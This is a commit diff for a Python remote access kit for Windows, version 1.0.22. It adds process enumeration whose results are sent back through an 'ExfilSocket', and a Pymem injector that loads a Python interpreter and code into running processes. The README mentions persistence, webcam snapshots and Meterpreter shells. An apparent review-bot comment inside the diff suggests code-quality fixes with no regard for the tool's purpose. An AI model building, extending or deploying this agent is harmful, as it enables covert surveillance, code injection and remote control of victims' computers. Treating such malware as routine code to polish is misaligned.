
Commit d025404

committed
Update 1.0.22
1 parent 1a6a10b commit d025404

39 files changed

+376
-290
lines changed

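--- a/README.md
+++ b/README.md
@@ -24,10 +24,11 @@ If you're looking for an open-source project to abuse, Look elsewhere. The autho
 Created with Python 3.9.X
 
 Client tested on:
-* Windows 10
+* Windows 10 x64
+* Windows 7 Ultimate SP1 x64
 
 Server tested on:
-* Debian
+* Debian
 
 # Features at release 1.0.0
 * Power Management (Shutdown/Reboot)
@@ -72,3 +73,11 @@ Server tested on:
 * Surveillance > Webcam > Snapshot
 * Various code optimizations
 * Fixed issue with agent disconnecting when server shuts down during initial handshake
+
+# Update 1.0.22
+* Tested agent on Windows 7 Ultimate SP1. Working.
+* Re-coded task manager on client and server
+* Optimized context menu code. Menu now loads instantly
+* Tested powershell reg key peristence on Windows 7. Working.
+* Created python injector in Task Manager. Can inject python code into process's.
+* Added CMD, PS and Python Meterpreter shells to the python injector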

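--- a/agent/windows_10/agent.py
+++ b/agent/windows_10/agent.py
@@ -10,7 +10,7 @@
 # [A Remote Access Kit for Windows]
 # Author: SlizBinksman
 # Github: https://github.com/slizbinksman
-# Build: 1.0.21
+# Build: 1.0.22
 # -------------------------------------------------------------
 
 import socket
@@ -22,10 +22,11 @@
 import threading
 import struct
 import cv2
-
+import psutil
 from PIL import ImageGrab
 from time import sleep
 from cryptography.fernet import Fernet
+from pymem import Pymem
 
 SEP = '<sep>' #Create static seperator string
 BUFFER = 4096 #Create static buffer int
@@ -57,12 +58,6 @@ def get_windows_version(self):
 version_output = version_output.replace('\n','') #Replace new line with empty string
 return version_output.strip('\r') #Strip carriage return and return the output
 
-#Function will return the output of all running process's on the machine
-def get_running_process(self):
-command = subprocess.Popen(['powershell', 'get-process'],stdout=subprocess.PIPE,shell=True) #Run the command
-com_output = command.stdout.read().decode() #Capture, read and decode output
-return com_output #Return output
-
 #Function will get computers local ip and return it as string
 def get_local_ip(self):
 local_ip = socket.gethostbyname(socket.gethostname()) #Resolve system name
@@ -116,8 +111,17 @@ def shutdown_computer(self):
 
 #Function will send back a list of running process's to the server
 def extract_process_list(self):
-process_list = Utilitys().get_running_process() #Get process's
-ExfilSocket().exfil_socket_send(process_list) #Send to server
+process_string = '' # Define a local string to store information about the process's
+for process in psutil.process_iter(): # For each process found in the running process's
+process_name = process.name() # Get process name
+pid = process.pid # Get pid of process
+try:
+username = process.username() # Get username
+except psutil.AccessDenied:
+username = 'NT AUTHORITY\SYSTEM' # If we are running in userland, admin process's will raise an error on call to username. manually set uname.
+string = f'{process_name}{SEP}{str(pid)}{SEP}{username}{SEP}\n' #Create string
+process_string += string # Append string to local master string
+ExfilSocket().exfil_socket_send(process_string) #Send local master string to server
 
 #Function will kill a task by the pid passed as parameter and send the output to the server
 def kill_task(self,pid):
@@ -162,6 +166,7 @@ def __init__(self):
 self.process_manager = 'proc_list'
 self.term_process = 'terminate'
 self.snapshot = 'snap_shot'
+self.inject_python = 'inject_pie'
 
 #Function will connect to server to initiate handshake
 def connect_to_server(self):
@@ -259,6 +264,8 @@ def main(self):
 SystemManager().kill_task(server_command[1]) #kill the task by pid received from server
 if action_flag == self.snapshot: #if the action is to send a snapshot from the webcam
 StreamSocket().webcam_snapshot() #Send a webcam snapshot
+if action_flag == self.inject_python: #If the action is to inject some python code,
+CodeExecution().inject_and_exec(server_command[1],server_command[2]) #Inject python code
 
 #Function will retrieve all data sent by server socket
 def recv_all_data(self):
@@ -379,4 +386,11 @@ def exec_(system_command): #Create local exec function
 pass
 MultiProcessor().start_child_thread_arg(exec_,system_command) #Start new thread for shell commands. Main thread will continue to communicate with server
 
+#Function will inject a python interpreter into a process and then load
+#Python code to be executed by it.
+def inject_and_exec(self,process_name,python_code):
+process = Pymem(process_name) #Hooke the process
+process.inject_python_interpreter() #Inject the python dll
+process.inject_python_shellcode(python_code) #Inject the python code into the code
+
 ClientSocket().connect_to_server()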
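Review bot: In the new `extract_process_list` (the `@@ -116,8 +111,17 @@` hunk), the `except psutil.AccessDenied` branch reports a fabricated owner: `AccessDenied` only means the caller's token cannot open the target's token, not that the process runs as SYSTEM, so services, protected processes and other users' processes are all labelled `NT AUTHORITY\SYSTEM` in the list sent to the server. The literal also uses `\S`, an invalid escape sequence that Python 3 flags with a DeprecationWarning (SyntaxWarning from 3.12); it happens to survive as a backslash, but a raw string is the correct spelling. I would replace the fallback with a neutral marker so the server-side task manager shows what is actually known, e.g. `except psutil.AccessDenied:` / `username = '<access denied>'`, and use `r'NT AUTHORITY\SYSTEM'` anywhere the SYSTEM string is genuinely meant. The comment on that line should then say "owner could not be queried from this context" rather than asserting the process is an admin/SYSTEM one.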

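--- a/core/Qt5/builder_guis/windows10/agent_builder_window.py
+++ b/core/Qt5/builder_guis/windows10/agent_builder_window.py
@@ -10,7 +10,7 @@
 # [A Remote Access Kit for Windows]
 # Author: SlizBinksman
 # Github: https://github.com/slizbinksman
-# Build: 1.0.21
+# Build: 1.0.22
 # -------------------------------------------------------------
 from core.logging.logging import DNSconfigs,NetworkingConfigs
 from core.builder.windows10.agent_builder import Builder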

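--- a/core/Qt5/handling_guis/image_display_window.py
+++ b/core/Qt5/handling_guis/image_display_window.py
@@ -10,7 +10,7 @@
 # [A Remote Access Kit for Windows]
 # Author: SlizBinksman
 # Github: https://github.com/slizbinksman
-# Build: 1.0.21
+# Build: 1.0.22
 # -------------------------------------------------------------
 import os
 
@@ -32,10 +32,10 @@ def get_image_size(self):
 
 #Function will save a file to the image_data directory with a random string for the name
 def save_raw_file(self):
-file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg'
-original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame)
-LoggingUtilitys().write_bytes_to_file(file_path,original_image_data)
-Notifications().raise_notification(
+file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg' #Create local file path string with random string for file name
+original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame) #Retrieve the bytes of the original image
+LoggingUtilitys().write_bytes_to_file(file_path,original_image_data) #Write those bytes to a new file and save it
+Notifications().raise_notification( #Notify the user with the name of the screenshot
 f'Saved file as {file_path}',
 'Success'
 )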
